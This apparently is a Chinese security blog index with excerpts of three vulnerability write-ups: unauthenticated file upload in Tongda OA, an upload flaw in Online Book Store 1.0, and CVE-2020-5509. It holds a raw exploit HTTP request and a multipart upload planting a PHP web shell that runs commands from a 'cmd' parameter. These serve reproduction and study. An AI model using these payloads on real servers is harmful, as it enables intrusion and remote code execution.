m4tirhacker@home:~$

  • Tongda Oa Vulnerability

    一.漏洞复现: 影响范围(但是只有V11版和2017版有包含文件的php,其余版本能上传文件.): V11版 2017版 2016版 2015版 2013增强版 2013版 这位老哥说的很详细 https://forum.90sec.com/t/topic/883 只要POST传递三个参数进行未授权文件上传! 开启Burp 抓包,改成post,加上poc. POST /ispirit/im/upload.php HTTP/1.1 Host: 目标ip User-Agent: python-requests/2.22.0 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Length: 921 Content-Type: multipart/form-data; boundary=e59b4539bd28a1b69eb29cc9fa61fbc1 --e59b4539bd28a1b69eb29cc9fa61fbc1 Content-Disposition: form-data; name="P" 123 --e59b4539bd28a1b69eb29cc9fa61fbc1 Content-Disposition: form-data; name="DEST_UID" 1 --e59b4539bd28a1b69eb29cc9fa61fbc1 Content-Disposition: form-data; name="UPLOAD_MODE" 2 --e59b4539bd28a1b69eb29cc9fa61fbc1 Content-Disposition: form-data;...

  • online-book-Getshell

    零.前言: 本篇文章将会写 Online Book Store 1.0 的前台任意文件上传漏洞分析,复现,及工具的编写! 小弟第一次接触代码审计,请大家见谅! Online Book Store 1.0 是国外某书城cms. 一.漏洞分析: 首先咱们用 Seay源代码审计工具 对程序进行自动审计! 发现/edit_book.php这个文件可能存在文件上传漏洞 <?php // if save change happen if(!isset($_POST['save_change'])){ echo "Something wrong!"; exit; } $isbn = trim($_POST['isbn']); $title = trim($_POST['title']); $author = trim($_POST['author']); $descr = trim($_POST['descr']); $price = floatval(trim($_POST['price'])); $publisher = trim($_POST['publisher']); if(isset($_FILES['image']) &&...

  • CVE-2020-5509漏洞分析

    前几天在Gayhub上看到了这个漏洞的exp,是国外小哥写的! Github原址:https://github.com/FULLSHADE/CVE-2020-5509-POC 前言 小弟第一次接触代码审计,故写下此文! 漏洞原理十分简单. 漏洞分析 首先祭出神器 Seay源代码审计工具对网站源码进行自动审计! 可以看到他这里有很多未过滤的文件上传,但是却是在后台,漏洞危害性小了很多! 这里要验证update,所以我们直接让update=“” 然后post http://website/admin/changeimage1.php 我们让协议头为 Content-Type: multipart/form-data; boundary="I am lonely" 上传的File数据为[其中–I am lonely是分割的,只需要在协议头中让他们保持一致即可!]: --I am lonely Content-Disposition: form-data; name="img1"; filename="test.php" Content-Type: image/jpeg <?php system($_GET["cmd"]); ?> --I am lonely Content-Disposition: form-data; name="update" --I am lonely END!